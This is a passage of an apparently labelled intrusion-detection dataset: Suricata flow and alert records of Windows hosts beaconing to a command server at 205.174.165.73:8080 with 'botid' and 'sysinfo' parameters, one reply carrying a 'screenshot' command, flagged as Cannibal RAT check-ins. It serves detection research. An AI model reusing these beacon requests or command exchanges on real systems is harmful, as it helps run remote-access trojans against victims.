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', 'packet_info': {'linktype': 1}} | 506 | attack | 1,249,418 |
192.168.10.9-2626-205.174.165.73-8080-6 | ['flow', 'http', 'fileinfo'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 6, flow_pkts_toclient: 5, flow_bytes_toserver: 554, flow_bytes_toclient: 433, flow_age: 0, flow_state: established, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: close_wait ; pcap_cnt: 4497507, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 10 ; pcap_cnt: 4497510, event_type: fileinfo, proto: TCP, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 10, app_proto: http, fileinfo_filename: /api/pop, fileinfo_gaps: False, fileinfo_state: CLOSED, fileinfo_stored: False, fileinfo_size: 10, fileinfo_tx_id: 0 | true | Botnet | true | 13:26:47 | 304,164 | Friday | [{'timestamp': '2017-07-07T13:26:47.671027+0000', 'flow_id': 472427278081160, 'pcap_cnt': 4497507, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2626, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 10, 'http_response_body_printable': 'screenshot', 'http_response_body': 'c2NyZWVuc2hvdA=='}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 4, 'bytes_toserver': 434, 'bytes_toclient': 373, 'start': '2017-07-07T13:26:47.367752+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoNjJAAIAGhvTAqAoJza6lSQpCH5CGy4i4jSFH+FAQAQBiuwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:26:47.671027+0000', 'flow_id': 472427278081160, 'pcap_cnt': 4497507, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2626, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 10, 'http_response_body_printable': 'screenshot', 'http_response_body': 'c2NyZWVuc2hvdA=='}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 4, 'bytes_toserver': 434, 'bytes_toclient': 373, 'start': '2017-07-07T13:26:47.367752+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoNjJAAIAGhvTAqAoJza6lSQpCH5CGy4i4jSFH+FAQAQBiuwAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 512 | attack | 1,249,705 |
192.168.10.14-51603-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4499974, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:26:50 | 72,618 | Friday | [{'timestamp': '2017-07-07T13:26:50.755214+0000', 'flow_id': 1664310767676796, 'pcap_cnt': 4499974, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51603, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:50.683388+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGVRAAIAGo83AqAoOza6lScmTH5AU+j8orRdLj1ARAQA7OAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:26:50.755214+0000', 'flow_id': 1664310767676796, 'pcap_cnt': 4499974, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51603, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:50.683388+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGVRAAIAGo83AqAoOza6lScmTH5AU+j8orRdLj1ARAQA7OAAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,249,918 |
192.168.10.15-52263-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4500719, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:26:52 | 153,287 | Friday | [{'timestamp': '2017-07-07T13:26:52.347095+0000', 'flow_id': 713984829093694, 'pcap_cnt': 4500719, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52263, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:52.194366+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobyRAAIAGTfzAqAoPza6lScwnH5Bc1WVoNfxR0FARAQA7YgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:26:52.347095+0000', 'flow_id': 713984829093694, 'pcap_cnt': 4500719, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52263, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:52.194366+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobyRAAIAGTfzAqAoPza6lScwnH5Bc1WVoNfxR0FARAQA7YgAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 308 | attack | 1,249,989 |
192.168.10.9-2741-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4503154, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:26:57 | 130,171 | Friday | [{'timestamp': '2017-07-07T13:26:57.996552+0000', 'flow_id': 337247478037122, 'pcap_cnt': 4503154, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2741, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:57.866946+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPDlAAIAGgO3AqAoJza6lSQq1H5DEsXIAkHN6yFARAQAE9wAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:26:57.996552+0000', 'flow_id': 337247478037122, 'pcap_cnt': 4503154, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2741, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:57.866946+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoPDlAAIAGgO3AqAoJza6lSQq1H5DEsXIAkHN6yFARAQAE9wAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,250,157 |
